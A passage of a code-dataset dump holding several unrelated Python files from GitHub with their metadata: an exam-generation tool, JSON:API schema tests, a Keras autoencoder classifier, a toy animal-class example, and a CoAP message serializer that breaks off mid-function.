self.f_struct:\r\n self.f_struct['template_path'] = (self.f_struct['db_questions'] +\r\n 'LaTexTemplates/')\r\n if 'template_fpath' not in self.f_struct:\r\n self.f_struct['template_fpath'] = (self.f_struct['template_path'] +\r\n 'Template.tex')\r\n\r\n # Check and clean project folder location\r\n if os.path.exists(self.project_path):\r\n print('Folder {} already exists.'.format(self.project_path))\r\n\r\n # Remove current backup folder, if it exists\r\n old_project_path = removeSlash(self.project_path) + '_old/'\r\n if os.path.exists(old_project_path):\r\n shutil.rmtree(old_project_path)\r\n\r\n # Copy current project folder to the backup folder.\r\n shutil.move(self.project_path, old_project_path)\r\n print('Moved to ' + old_project_path)\r\n\r\n # Create project folder and subfolders\r\n os.makedirs(self.project_path)\r\n\r\n # Create class_list subdirectory if it does not exist.\r\n # The remaininng subfolders will be created by the method that fills\r\n # them with content.\r\n if not os.path.exists(self.f_struct['class_list']):\r\n os.makedirs(self.f_struct['class_list'])\r\n\r\n # Save metadata\r\n metadata = {'f_struct': self.f_struct,\r\n 'exam_class': exam_class}\r\n if not os.path.exists(self.state):\r\n os.makedirs(self.state)\r\n with open(self.metadata, 'wb') as f:\r\n pickle.dump(metadata, f)\r\n\r\n def load(self, f_struct={}):\r\n \"\"\"\r\n Loads an existing project, by reading the metadata file in the project\r\n folder.\r\n It can be used to modify file or folder names, or paths, by specifying\r\n the new names/paths in the f_struct dictionary.\r\n \"\"\"\r\n\r\n # Check and clean project folder location\r\n if not os.path.exists(self.project_path):\r\n print('Folder {} does not exist.'.format(self.project_path))\r\n exit('You must create the project first')\r\n\r\n else:\r\n\r\n # Save project structure.\r\n with open(self.metadata, 'rb') as f:\r\n metadata = pickle.load(f)\r\n\r\n # Read metadata dictionary\r\n self.exam_class = metadata['exam_class']\r\n self.f_struct = metadata['f_struct']\r\n\r\n # Change default names by those specified in f_struct\r\n for s, v in f_struct.items():\r\n self.f_struct[s] = v\r\n metadata['f_struct'] = self.f_struct\r\n\r\n # Save project structure.\r\n with open(self.metadata, 'wb') as f:\r\n pickle.dump(metadata, f)\r\n\r\n def loadStudents(self):\r\n '''\r\n Generates a dataframe of students.\r\n For each student, name, nia and group are stored.\r\n Student data are taken from the xls files in the 'class_list' folder\r\n '''\r\n\r\n # #######################\r\n # Configurable parameters\r\n # #######################\r\n\r\n # Input folder containing the lists of students in the course.\r\n input_folder = self.f_struct['class_list']\r\n output_fname = self.f_struct['all_students']\r\n\r\n # ###############\r\n # Read input data\r\n # ###############\r\n\r\n # Read NIAs\r\n print('\\n... Reading xls files')\r\n f_names = [f for f in os.listdir(input_folder)\r\n if len(f) > 5 and f[-5:] == '.xlsx']\r\n\r\n # Set the group name by removing file extension.\r\n groups = [f.replace('.xlsx', '') for f in f_names]\r\n # Now we remove termination ' listadeclase'. This is specific of the\r\n # class_list files at UC3M.\r\n groups = [f.replace(' listadeclase', '') for f in groups]\r\n\r\n # Warn if there are no xls files in the class list folder\r\n if len(groups) == 0:\r\n print('WARNING: There are no groups in the class_list folder.')\r\n print('Download the class lists from Aula Global and place ' +\r\n ' them in {0}.'.format(self.f_struct['class_list']))\r\n\r\n df_students = False\r\n\r\n else:\r\n\r\n sgroup = {}\r\n for f, g in zip(f_names, groups):\r\n # Read class list of group g\r\n print(' ' + f)\r\n sgroup[g] = pd.read_excel(input_folder + f)\r\n sgroup[g].rename(\r\n columns={'Dirección de correo': 'Email address',\r\n 'Apellido(s)': 'Surname', 'Nombre': 'First name',\r\n 'NIU': 'NIA'},\r\n inplace=True)\r\n # Add a new column identifying the group of each student\r\n sgroup[g]['group'] = g\r\n\r\n # Join all groups of students in a single dataframe.\r\n df_students = pd.concat(sgroup, axis=0, ignore_index=True)\r\n df_students['Full name'] = (df_students['First name'] + ' ' +\r\n df_students['Surname'])\r\n\r\n # Save dataframe\r\n print(df_students.head())\r\n df_students.to_csv(output_fname)\r\n\r\n return df_students\r\n\r\n def _makeExams(self, n_exams, exam_struct, q_ignore=[], q_mandatory=[],\r\n seed=None):\r\n \"\"\"\r\n Compose a set of exams.\r\n\r\n :Args:\r\n :n_exams: Number of exames to be generated.\r\n :exam_struct: Structure of the requested exam.\r\n It is a dictionary defining the structure of each exam part\r\n exam_struct = {key1: v1, key2: v2, ...}\r\n where\r\n key1, key2,...\r\n are the names of each part. These names are not arbitrary: they\r\n must be equal to the tags used in the latex template to specify\r\n the location of the questions for each part. Also,\r\n v1, v2, ...\r\n are lists defining the structure of each part. For instance,\r\n s1 = [tag1, [tag2, tag3], [tag4, tag5]]\r\n defines part 1 with 3 questions:\r\n - 1st question is about the topic specified in tag1\r\n - 2nd question is about tag2 or tag3\r\n - 3rd question is about tag4 or tag5.\r\n tag1, tag2, etc must be strings.\r\n :q_ignore: List of questions that must be ignored, and not used in\r\n this exam.\r\n :q_mandatory: List of questions that must appear in at least one of\r\n the exams.\r\n :seed: Seed for the random exam generation. If None, no seed is\r\n used, so the set of exams generated by this script will change\r\n after each run.\r\n :Returns:\r\n :exam_pack: Dictionary containing the list of question for each of\r\n the generated exams.\r\n \"\"\"\r\n\r\n ###################\r\n # ## Config Section\r\n ###################\r\n\r\n # Location and names of the source files\r\n dbq_path = self.f_struct['db_questions']\r\n figq_folder = self.f_struct['figq_path']\r\n template_path = self.f_struct['template_path']\r\n template_fpath = self.f_struct['template_fpath']\r\n\r\n # Location and names of the output files\r\n out_folder = self.f_struct['exam_statement']\r\n basename = self.f_struct['basename']\r\n\r\n # Required packages.\r\n # Write here the filename of all packages required to run the tex file.\r\n # The files should be available in the running folder.\r\n packages = ['mcode.sty']\r\n\r\n ########################\r\n # Read and organize data\r\n ########################\r\n\r\n # Date for the exam header\r\n now = datetime.now()\r\n date_en = format_date(now, format='MMM, YYYY', locale='en')\r\n date_es = format_date(now, format='MMM, YYYY', locale='es')\r\n # date = datetime.now().strftime(\"%B, %G%\")\r\n\r\n # The code below assumes that each filename has the form\r\n # xx_topic_xxx.tex\r\n\r\n # Read tex filenames\r\n f_names = [f for f in os.listdir(dbq_path) if f.endswith('.tex')]\r\n\r\n # List of topics.\r\n # We assume here that the topics are embedded in the filename.\r\n topics = set([f.split('_')[1] for f in f_names])\r\n\r\n # Create dictionary tags-->questions:\r\n q = {}\r\n for t in topics:\r\n q[t] = [f for f in f_names if t in f]\r\n\r\n ##############################\r\n # Candidate list for each test\r\n ##############################\r\n\r\n # Create the list of candidates for each section and each question\r\n candidates = {}\r\n for sec in exam_struct:\r\n candidates[sec] = []\r\n for topic_subset in exam_struct[sec]:\r\n candidates[sec].append(\r\n [el for t in topic_subset for el in q[t]\r\n if el not in q_ignore])\r\n\r\n ######################\r\n # Create ouput folders\r\n ######################\r\n\r\n # Remove current output folder, if it exists\r\n if os.path.exists(out_folder):\r\n shutil.rmtree(out_folder)\r\n # Create new clean output folder and subfolders\r\n os.makedirs(out_folder)\r\n\r\n # Create exam subfolders\r\n self.exam_tags = []\r\n for k in range(n_exams):\r\n self.exam_tags.append(basename + str(k))\r\n out_folder_k = out_folder + basename + str(k)\r\n os.makedirs(out_folder_k)\r\n\r\n for f in packages:\r\n shutil.copy(template_path + f, out_folder_k + '/' + f)\r\n\r\n ############################\r\n # Compose and save all exams\r\n ############################\r\n\r\n # Read template file\r\n text = open(template_fpath).read()\r\n\r\n # Select questions for each exam\r\n # Note that the i-th item in q does NOT contains the questions of the\r\n # i-th exam, but the i-th questions of ALL exams\r\n\r\n # Reset random number generator\r\n if seed is not None:\r\n np.random.seed(seed)\r\n\r\n # Compute the matrix of selected questions.\r\n # SelectedQ[n][e] will be que n-th question of exam e\r\n selectedQ = {}\r\n for sec in exam_struct:\r\n selectedQ[sec] = []\r\n for options in candidates[sec]:\r\n selectedQ[sec].append(getItems(options, q_mandatory, n_exams))\r\n\r\n # This is the output variable containing the schema of each exam.\r\n exam_out = []\r\n\r\n # Read selected tests and problems from file\r\n for e in range(n_exams):\r\n\r\n # Print exam.\r\n print('Exam {0}: questions:'.format(e))\r\n\r\n # Start exam composition:\r\n exam_e = text.replace('', date_en)\r\n exam_e = exam_e.replace('', date_es)\r\n exam_e = exam_e.replace('figs/', figq_folder)\r\n\r\n qe = {}\r\n\r\n for sec in exam_struct:\r\n\r\n # List of questions for exam e\r\n qe[sec] = [selectedQ[sec][n][e]\r\n for n in range(len(selectedQ[sec]))]\r\n\r\n # Print selected questions from this section\r\n print(' - {}'.format(qe[sec]))\r\n\r\n exam_quests = ''\r\n for q in qe[sec]:\r\n # Read tests for exam e, from database files\r\n with open(dbq_path + q, 'r') as f:\r\n body = f.read()\r\n exam_quests += '\\\\question[8] \\n\\n' + body + '\\n\\n'\r\n\r\n # Compose exam k\r\n exam_e = exam_e.replace('<' + sec + '>', exam_quests)\r\n\r\n # Save exam e to .tex file.\r\n fpath_exam_e = out_folder + basename + str(e) + \\\r\n '/' + basename + str(e) + '.tex'\r\n with open(fpath_exam_e, \"a+\") as f:\r\n f.write(exam_e)\r\n\r\n # Save the exam list into a csv file\r\n qe_names = [q.split('.tex')[0] for q in qe]\r\n fpath_qe = out_folder + basename + str(e) + '/' + basename + \\\r\n str(e) + '.csv'\r\n with open(fpath_qe, 'w') as f:\r\n wr = csv.writer(f, dialect='excel')\r\n wr.writerow(qe_names)\r\n\r\n exam_out.append(qe)\r\n\r\n return exam_out\r\n\r\n def prepareStResultsFolder(self):\r\n\r\n # Prepare student results folder, one per exam:\r\n if not os.path.exists(self.f_struct['student_results']):\r\n os.makedirs(self.f_struct['student_results'])\r\n\r\n for d in self.exam_tags:\r\n p = self.f_struct['student_results'] + d\r\n if not os.path.exists(p):\r\n os.makedirs(p)\r\n\r\n def generateDataFiles(self, generateData):\r\n '''\r\n Generates all data files for students in the xls files in the\r\n 'class_list' folder, using the generateData function provided as an\r\n argument.\r\n '''\r\n\r\n # ###############\r\n # Read input data\r\n # ###############\r\n\r\n # Read NIAs\r\n print('\\n... Reading student NIAs')\r\n df_students = pd.read_csv(self.f_struct['all_students'])\r\n\r\n # Identify groups\r\n groups = set(df_students['group'].tolist())\r\n\r\n # ######################\r\n # Prepare output folders\r\n # ######################\r\n\r\n # # Folder that will contain the output files.\r\n out_folder = self.f_struct['data4students']\r\n\r\n print('... Setting output folders')\r\n # Remove current output folder, if it exists\r\n if os.path.exists(out_folder):\r\n shutil.rmtree(out_folder)\r\n # Create new clean output folder and subfolders\r\n os.makedirs(out_folder)\r\n for g in groups:\r\n os.makedirs(out_folder + g)\r\n\r\n # ###############\r\n # Data generation\r\n # ###############\r\n\r\n # Generate and save\r\n print('... Computing data and saving output files')\r\n for k, st in df_students.iterrows():\r\n g = st['group']\r\n fpath = out_folder + g + '/' + str(st['NIA']) + '.mat'\r\n data = generateData(st['NIA'])\r\n savemat(fpath, data)\r\n\r\n print('... Done.\\n')\r\n\r\n def getVarData(self, df, var):\r\n\r\n x = df[(var, 'w·s')].as_matrix()\r\n x = x[~np.isnan(x)]\r\n\r\n return x\r\n\r\n def getDataStats(self, x):\r\n\r\n # Compute mean and standard deviation\r\n m = np.mean(x)\r\n std = np.std(x)\r\n\r\n # Compute upper and lower standard deviations\r\n # Note that samples with x=m enter both xpos and xneg. This is likely\r\n # not correct. But I guess samples with x=m are few, if any.\r\n x_up = x[x >= m] - m\r\n x_down = m - x[x <= m]\r\n std_up = np.sqrt(np.mean(x_up**2))\r\n std_down = np.sqrt(np.mean(x_down**2))\r\n\r\n # Save stats\r\n stats = {'mean': m, 'std_up': std_up, 'std_down': std_down, 'std': std}\r\n\r\n return stats\r\n\r\n def analyzeExams(self):\r\n\r\n # ############\r\n # Loading data\r\n if 'student_notes_fname' not in self.f_struct:\r\n self.f_struct['student_notes_fname'] = 'student_notes.xlsx'\r\n\r\n # Read matlab files in the input directory tree\r\n datafiles = glob.glob(self.f_struct['eval_results'] + '**/' +\r\n self.f_struct['student_notes_fname'],\r\n recursive=True)\r\n\r\n # Read files\r\n df = pd.DataFrame()\r\n\r\n print('... concatenate all evaluation events')\r\n for dtfile in sorted(datafiles):\r\n\r\n df2 = pd.read_excel(dtfile, header=[0, 1])\r\n\r\n # Add to dataframe\r\n df = pd.concat([df, df2], axis=0)\r\n # df.sort_index(axis=1, inplace=True)\r\n\r\n # Read variable names\r\n allCols = df.columns.levels[0].tolist()\r\n metaCols = ['Delivery', 'Exam', 'Final', 'Unnamed: 0_level_0']\r\n varCols = list(set(allCols) - set(metaCols))\r\n\r\n # Get dictionary of variable: data.\r\n scores = {}\r\n stats = {}\r\n\r\n for var in varCols:\r\n\r\n scores[var] = self.getVarData(df, var)\r\n stats[var] = self.getDataStats(scores[var])\r\n\r\n N = len(varCols)\r\n menMeans = np.array([stats[var]['mean'] for var in varCols])\r\n # menStd = [stats[var]['std'] for var in varCols]\r\n std_up = [stats[var]['std_up'] for var in varCols]\r\n std_down = [stats[var]['std_down'] for var in varCols]\r\n err = np.array([std_down, std_up])\r\n\r\n ids_sorted = np.argsort(menMeans)\r\n mSorted = menMeans[ids_sorted]\r\n errSorted = err[:, ids_sorted]\r\n varSorted = [varCols[i] for i in ids_sorted]\r\n\r\n plt.figure()\r\n y_pos = np.arange(N) # the x locations for the groups\r\n plt.barh(y_pos, mSorted, align='center', alpha=0.4, xerr=errSorted)\r\n plt.yticks(y_pos, varSorted)\r\n plt.xlabel('Average score')\r\n plt.title('Mean and one-sided standard deviations of scores')\r\n plt.show()\r\n\r\n # fig, ax = plt.subplots()\r\n # ind = np.arange(N) # the x locations for the groups\r\n # width = 0.70 # the width of the bars\r\n # ax.barh(ind, menMeans, width, color='b', xerr=menStd)\r\n # ax.set_title('Average scores for each variable')\r\n # # ax.set_xticks(ind + width / 2)\r\n # ax.set_yticklabels(varCols)\r\n # # ax.tick_params(axis='x')\r\n # ax.autoscale_view()\r\n\r\n return\r\n\r\n","repo_name":"ML4DS/ExamManagerPub","sub_path":"examManager/code/lib/examProject.py","file_name":"examProject.py","file_ext":"py","file_size_in_byte":22003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37399923418","text":"from .schemas import (\n BookSchemaDefault,\n BookSchemaTypeRequired,\n BookSchemaEveryoneRequired,\n BookSchemaCustomValidator,\n BookSchemaRelationship,\n BookSchemaWithTwoRelationship,\n Father,\n Child,\n Many)\n\n\nclass TestApificator:\n def test_default(self):\n _payload = {}\n assert BookSchemaDefault().load(_payload)\n\n def test_type_required(self):\n _payload = {}\n book = BookSchemaTypeRequired().load(_payload)\n assert book.errors['data']['type'] == ['Missing data for required field.']\n _payload = {\n \"data\": {\n \"attributes\": {},\n \"type\": \"book\"\n }\n }\n book = BookSchemaTypeRequired().load(_payload)\n assert book.errors == {}\n\n def test_everyone_required(self):\n _payload = {\n \"data\": {}\n }\n book = BookSchemaEveryoneRequired().load(_payload)\n assert book.errors['data']['type'] == ['Missing data for required field.']\n assert book.errors['data']['id'] == ['Missing data for required field.']\n assert book.errors['data']['attributes'] == ['Missing data for required field.']\n _payload = {\n \"data\": {\n \"type\": \"book\",\n \"attributes\": {},\n \"id\": \"\"\n }}\n book = BookSchemaEveryoneRequired().load(_payload)\n assert book.errors == {}\n\n def test_custom_validator(self):\n _payload = {}\n book = BookSchemaCustomValidator().load(_payload)\n assert book.errors['data']['type'] == ['Missing data for required field.']\n _payload = {\n \"data\": {\n \"type\": \"books\"\n }\n }\n book = BookSchemaCustomValidator().load(_payload)\n assert book.errors['data']['type'] == ['type must be book']\n _payload = {\n \"data\": {\n \"type\": \"book\"\n }\n }\n book = BookSchemaCustomValidator().load(_payload)\n assert book.errors == {}\n\n def test_one_relationship(self):\n _payload = {\n \"data\": {\n \"relationships\": {}\n }\n }\n book = BookSchemaRelationship().load(_payload)\n assert book.errors['data']['relationships']\n assert book.errors['data']['type']\n _payload = {\n \"data\": {\n \"type\": \"book\",\n \"attributes\": {\n \"title\": \"It\"\n },\n \"relationships\": {\n \"author_schema\": {\n \"name\": \"Jose\"\n }\n }\n }\n }\n book = BookSchemaRelationship().load(_payload)\n assert not book.errors\n\n def test_two_relationships(self):\n _payload = {\n \"data\": {\n \"relationships\": {}\n }\n }\n book = BookSchemaWithTwoRelationship().load(_payload)\n assert len(book.errors['data']['relationships']) == 1\n assert book.errors['data']['type']\n _payload = {\n \"data\": {\n \"type\": \"book\",\n \"attributes\": {\n \"title\": \"It\"\n },\n \"relationships\": {\n \"author_schema\": {\n \"name\": \"Jose\"\n },\n \"publish_schema\": {\n \"name\": \"Martin\"\n }\n }\n }\n }\n book = BookSchemaWithTwoRelationship().load(_payload)\n assert not book.errors\n\n def test_inheritance(self):\n assert Father().validate({\"data\": {\"attributes\": {}}}) == {\n 'data': {'attributes': {'age': [u'Missing data for required field.'],\n 'name': [u'Missing data for required field.']}}}\n assert Child().validate({\"data\": {\"attributes\": {}}}) == {}\n\n def test_many_true(self):\n assert Many().validate({\"data\": []}) == {}\n assert Many().validate({\"data\": [{\"name\": 12345.12}]}) == {\n 'data': {0: {'name': ['Not a valid string.'], 'age': ['Missing data for required field.']}}}\n","repo_name":"geru-br/geru-marshmallow-jsonapi","sub_path":"tests/test_apificator.py","file_name":"test_apificator.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41618819887","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\ndataset = pd.read_csv('training.csv')\n\ntrain_data = dataset.sample(frac=0.8, random_state=0)\ntest_data = dataset.drop(train_data.index)\n\nx_train = train_data.drop(['ONCOGENIC'], axis=1).to_numpy()\ny_train = train_data['ONCOGENIC'].to_numpy()\nx_test = test_data.drop(['ONCOGENIC'], axis=1).to_numpy()\ny_test = test_data['ONCOGENIC'].to_numpy()\n\nx_train = x_train.astype('float32') / 255.0\nx_test = x_test.astype('float32') / 255.0\n\ninput_shape = (26,)\nencoding_dim1 = 122\nencoding_dim2 = 13\nencoding_dim3 = 2\n\ninput_layer = keras.Input(shape=input_shape)\nencoder1 = layers.Dense(encoding_dim1, activation='relu')(input_layer)\nencoder2 = layers.Dense(encoding_dim2, activation='relu')(encoder1)\nencoder3 = layers.Dense(encoding_dim3, activation='relu')(encoder2)\n\ndecoder1 = layers.Dense(encoding_dim2, activation='relu')(encoder3)\ndecoder2 = layers.Dense(encoding_dim1, activation='relu')(decoder1)\noutput_layer = layers.Dense(26, activation='sigmoid')(decoder2)\n\nmodel = keras.Model(inputs=input_layer, outputs=output_layer)\n\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\nmodel.fit(x_train, x_train, batch_size=32, epochs=10, validation_split=0.1)\n\nencoder = keras.Model(inputs=input_layer, outputs=encoder3)\nencoded_x_train = encoder.predict(x_train)\nencoded_x_test = encoder.predict(x_test)\n\nclassifier = keras.Sequential(\n [\n layers.Dense(128, activation='relu', input_shape=(encoding_dim3,)),\n layers.Dense(6, activation='softmax')\n ]\n)\n\nclassifier.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\ny_train = keras.utils.to_categorical(y_train)\ny_test = keras.utils.to_categorical(y_test)\nclassifier.fit(encoded_x_train, y_train, batch_size=32, epochs=10, validation_split=0.1)\n\ntrain_loss, train_accuracy = classifier.evaluate(encoded_x_train, y_train)\nprint(f\"Training Accuracy: {train_accuracy}\")\n\ntest_loss, test_accuracy = classifier.evaluate(encoded_x_test, y_test)\nprint(f\"Testing Accuracy: {test_accuracy}\")","repo_name":"ZeeFcd/projektmunka3","sub_path":"DeepLearningAlgorithms/Stacked Auto-Encoders.py","file_name":"Stacked Auto-Encoders.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15334601144","text":"import pandas as pd\r\nimport random\r\n\r\nnames = [\"Roger\", \"Stuart\", \"Buddy\", \"Johnson\", \"Tommy\"]\r\ncolors = [\"Red\", \"Green\", \"Yellow\", \"Gray\", \"Blue\"]\r\nspecies_names = [\"Wooly Mammoth\", \"Birds\", \"Reptiles\", \"Fish\", \"Rodents\"]\r\n\r\nclass ExoticAnimals:\r\n def __init__(self, name, height=1, weight=1, color='brown',\r\n legs=4, species=None, mammal=True):\r\n self.name = str(name)\r\n self.height = int(height)\r\n self.weight = int(weight)\r\n self.color = color\r\n self.legs = legs\r\n self.species = species\r\n self.mammal = mammal\r\n\r\n def move(self, distance, direction):\r\n return f\"{self.name} travels {distance} meters in {direction} direction!\"\r\n\r\n def eat(self, food):\r\n return f\"Yum, yum! I love {food}!\"\r\n\r\nclass Anaconda(ExoticAnimals):\r\n def __init__(self, name, height, weight, color, constrictor, legs=0, species=\"snake\", mammal=False):\r\n super().__init__(name, height, weight, color, legs, species, mammal)\r\n self.constrictor = bool(constrictor)\r\n\r\n def move(self, distance, direction):\r\n return f\"{self.name} slithers {distance} meters in {direction} direction!\"\r\n\r\n\r\ndef create_animal():\r\n print(\"Welcome to the program! Please provide the following info:\")\r\n n = input(\"What is your animal's name? \")\r\n h = input(\"What is your animal's height? \")\r\n w = input(\"What is your animal's weight? \")\r\n c = input(\"What is your animal's color? \")\r\n l = input(\"What is your animal's number of legs? \")\r\n s = input(\"What is your animal's species? \")\r\n m = input(\"Is your animal a mammal? True or False \")\r\n dist = input(\"How far will your animal travel? \")\r\n dirc = input(\"Which direction will your animal go? \")\r\n user_animal = ExoticAnimals(name=n, height=h, weight=w, color=c, legs=l, species=s, mammal=m)\r\n print(user_animal.move(dist, dirc))\r\n\r\ndef lots_of_animals(n):\r\n animals = []\r\n while n > 0:\r\n a_name = random.choice(names)\r\n a_height = random.randint(5, 501)\r\n a_weight = random.randint(2, 2001)\r\n a_color = random.choice(colors)\r\n a_legs = random.randint(0, 5)\r\n a_species = random.choice(species_names)\r\n if a_species == \"Rodents\" or a_species == \"Wooly Mammoth\":\r\n a_mammal = True\r\n else:\r\n a_mammal = False\r\n\r\n a_animal = ExoticAnimals(a_name, a_height, a_weight, a_color, a_legs, a_species, a_mammal)\r\n animals.append(a_animal)\r\n\r\n n = n-1\r\n \r\n return animals\r\n","repo_name":"dscohen75/lambdata","sub_path":"lambdata_dscohen75/oop_example_ds19.py","file_name":"oop_example_ds19.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9700919","text":"import logging\nimport struct\nimport ctypes\nfrom coapthon.messages.request import Request\nfrom coapthon.messages.response import Response\nfrom coapthon.messages.option import Option\nfrom coapthon import defines\nfrom coapthon.messages.message import Message\n\n__author__ = 'Giacomo Tanganelli'\n\nlogger = logging.getLogger(__name__)\n\n\nclass Serializer(object):\n \"\"\"\n Serializer class to serialize and deserialize CoAP message to/from udp streams.\n \"\"\"\n @staticmethod\n def deserialize(datagram, source):\n \"\"\"\n De-serialize a stream of byte to a message.\n\n :param datagram: the incoming udp message\n :param source: the source address and port (ip, port)\n :return: the message\n :rtype: Message\n \"\"\"\n try:\n fmt = \"!BBH\"\n pos = struct.calcsize(fmt)\n s = struct.Struct(fmt)\n values = s.unpack_from(datagram)\n first = values[0]\n code = values[1]\n mid = values[2]\n version = (first & 0xC0) >> 6\n message_type = (first & 0x30) >> 4\n token_length = (first & 0x0F)\n if Serializer.is_response(code):\n message = Response()\n message.code = code\n elif Serializer.is_request(code):\n message = Request()\n message.code = code\n else:\n message = Message()\n message.source = source\n message.destination = None\n message.version = version\n message.type = message_type\n message.mid = mid\n if token_length > 0:\n fmt = \"%ss\" % token_length\n s = struct.Struct(fmt)\n token_value = s.unpack_from(datagram[pos:])[0]\n message.token = token_value\n else:\n message.token = None\n\n pos += token_length\n current_option = 0\n values = datagram[pos:]\n length_packet = len(values)\n pos = 0\n while pos < length_packet:\n next_byte = struct.unpack(\"B\", values[pos])[0]\n pos += 1\n if next_byte != int(defines.PAYLOAD_MARKER):\n # the first 4 bits of the byte represent the option delta\n # delta = self._reader.read(4).uint\n num, option_length, pos = Serializer.read_option_value_len_from_byte(next_byte, pos, values)\n current_option += num\n # read option\n try:\n option_item = defines.OptionRegistry.LIST[current_option]\n except KeyError:\n (opt_critical, _, _) = defines.OptionRegistry.get_option_flags(current_option)\n if opt_critical:\n raise AttributeError(\"Critical option %s unknown\" % current_option)\n else:\n # If the non-critical option is unknown\n # (vendor-specific, proprietary) - just skip it\n #log.err(\"unrecognized option %d\" % current_option)\n pass\n else:\n if option_length == 0:\n value = None\n elif option_item.value_type == defines.INTEGER:\n tmp = values[pos: pos + option_length]\n value = 0\n for b in tmp:\n value = (value << 8) | struct.unpack(\"B\", b)[0]\n elif option_item.value_type == defines.OPAQUE:\n tmp = values[pos: pos + option_length]\n value = bytearray(tmp)\n else:\n tmp = values[pos: pos + option_length]\n value = \"\"\n for b in tmp:\n value += str(b)\n\n option = Option()\n option.number = current_option\n option.value = Serializer.convert_to_raw(current_option, value, option_length)\n\n message.add_option(option)\n if option.number == defines.OptionRegistry.CONTENT_TYPE.number:\n message.payload_type = option.value\n finally:\n pos += option_length\n else:\n\n if length_packet <= pos:\n # log.err(\"Payload Marker with no payload\")\n raise AttributeError(\"Packet length %s, pos %s\" % (length_packet, pos))\n message.payload = \"\"\n payload = values[pos:]\n for b in payload:\n message.payload += str(b)\n pos += 1\n return message\n except AttributeError:\n return defines.Codes.BAD_REQUEST.number\n except struct.error:\n return defines.Codes.BAD_REQUEST.number\n\n @staticmethod\n def serialize(message):\n \"\"\"\n Serialize a message to a udp packet\n\n :type message: Message\n :param message: the message to be serialized\n :rtype: stream of byte\n :return: the message serialized\n \"\"\"\n fmt = \"!BBH\"\n\n if message.token is None or message.token == \"\":\n tkl = 0\n else:\n tkl = len(message.token)\n tmp = (defines.VERSION << 2)\n tmp |= message.type\n tmp <<= 4\n tmp |= tkl\n values = [tmp, message.code, message.mid]\n\n if message.token is not None and tkl > 0:\n\n for b in str(message.token):\n fmt += \"c\"\n values.append(b)\n\n options = Serializer.as_sorted_list(message.options) # already sorted\n lastoptionnumber = 0\n for option in options:\n\n # write 4-bit option delta\n optiondelta = option.number - lastoptionnumber\n optiondeltanibble = Serializer.get_option_nibble(optiondelta)\n tmp = (optiondeltanibble << defines.OPTION_DELTA_BITS)\n\n # write 4-bit option length\n optionlength = option.length\n optionlengthnibble = Serializer.get_option_nibble(optionlength)\n tmp |= optionlengthnibble\n fmt += \"B\"\n values.append(tmp)\n\n # write extended option delta field (0 - 2 bytes)\n if optiondeltanibble == 13:\n fmt += \"B\"\n values.append(optiondelta - 13)\n elif optiondeltanibble == 14:\n fmt += \"H\"\n values.append(optiondelta - 269)\n\n # write extended option length field (0 - 2 bytes)\n if optionlengthnibble == 13:\n fmt += \"B\"\n values.append(optionlength - 13)\n elif optionlengthnibble == 14:\n fmt += \"H\"\n values.append(optionlength - 269)\n\n # write option value\n if optionlength > 0:\n opt_type = defines.OptionRegistry.LIST[option.number].value_type\n if opt_type == defines.INTEGER:\n words = Serializer.int_to_words(option.value, optionlength, 8)\n for num in range(0, optionlength):\n fmt += \"B\"\n values.append(words[num])\n elif opt_type == defines.STRING:\n for b in str(option.value):\n fmt += \"c\"\n values.append(b)\n else:\n for b in option.value:\n fmt += \"B\"\n values.append(b)\n\n\n # update last option number\n lastoptionnumber = option.number\n\n payload = message.payload\n\n if payload is not None and len(payload) > 0:\n # if payload is present and of non-zero length, it is prefixed by\n # an one-byte Payload Marker (0xFF) which indicates the end of\n # options and the start of the payload\n\n fmt += \"B\"\n values.append(defines.PAYLOAD_MARKER)\n\n for b in str(payload):\n fmt += \"c\"\n values.append(b)\n\n datagram = None\n if values[1] is None:\n values[1] = 0\n try:\n s = struct.Struct(fmt)\n datagram = ctypes.create_string_buffer(s.size)\n s.pack_into(datagram, 0, *values)\n except struct.error:\n # The .exception method will report on the exception encountered\n # and provide a traceback.\n logging.exception('Failed to pack structure')\n\n return datagram\n\n @staticmethod\n def is_request(code):\n \"\"\"\n Checks if is request.\n\n :return: True, if is request\n \"\"\"\n return defines.REQUEST_CODE_LOWER_BOUND <= code <= defines.REQUEST_CODE_UPPER_BOUND\n\n @staticmethod\n def is_response(code):\n \"\"\"\n Checks if is response.\n\n :return: True, if is response\n \"\"\"\n return defines.RESPONSE_CODE_LOWER_BOUND <= code <= defines.RESPONSE_CODE_UPPER_BOUND\n\n @staticmethod\n def read_option_value_from_nibble(nibble, pos, values):\n \"\"\"\n Calculates the value used in the extended option fields.\n\n :param nibble: the 4-bit option header value.\n :return: the value calculated from the nibble and the extended option value.\n \"\"\"\n if nibble <= 12:\n return nibble, pos\n elif nibble == 13:\n tmp = struct.unpack(\"!B\", values[pos])[0] + 13\n pos += 1\n return tmp, pos\n elif nibble == 14:\n s = struct.Struct(\"!H\")\n tmp = s.unpack_from(values[pos:])[0] + 269\n pos += 2\n return tmp, pos\n else:\n raise AttributeError(\"Unsupported option nibble \" + str(nibble))\n\n @staticmethod\n def read_option_value_len_from_byte(byte, pos, values):\n \"\"\"\n Calculates the value and length used in the extended option fields.\n\n :param byte: 1-byte option header value.\n :return: the value and length, calculated from the header including the extended fields.\n \"\"\"\n h_nibble = (byte & 0xF0) >> 4\n l_nibble = byte & 0x0F\n value = 0\n length = 0\n if h_nibble <= 12:\n value = h_nibble\n elif h_nibble == 13:\n value = struct.unpack(\"!B\", values[pos])[0] + 13\n pos += 1\n elif h_nibble == 14:\n s = struct.Struct(\"!H\")\n value = s.unpack_from(values[pos:])[0] + 269\n pos += 2\n else:\n raise AttributeError(\"Unsupported option number nibble \" + str(h_nibble))\n\n if l_nibble <= 12:\n length = l_nibble\n elif l_nibble == 13:\n length = struct.unpack(\"!B\", values[pos])[0] + 13\n pos += 1\n elif l_nibble == 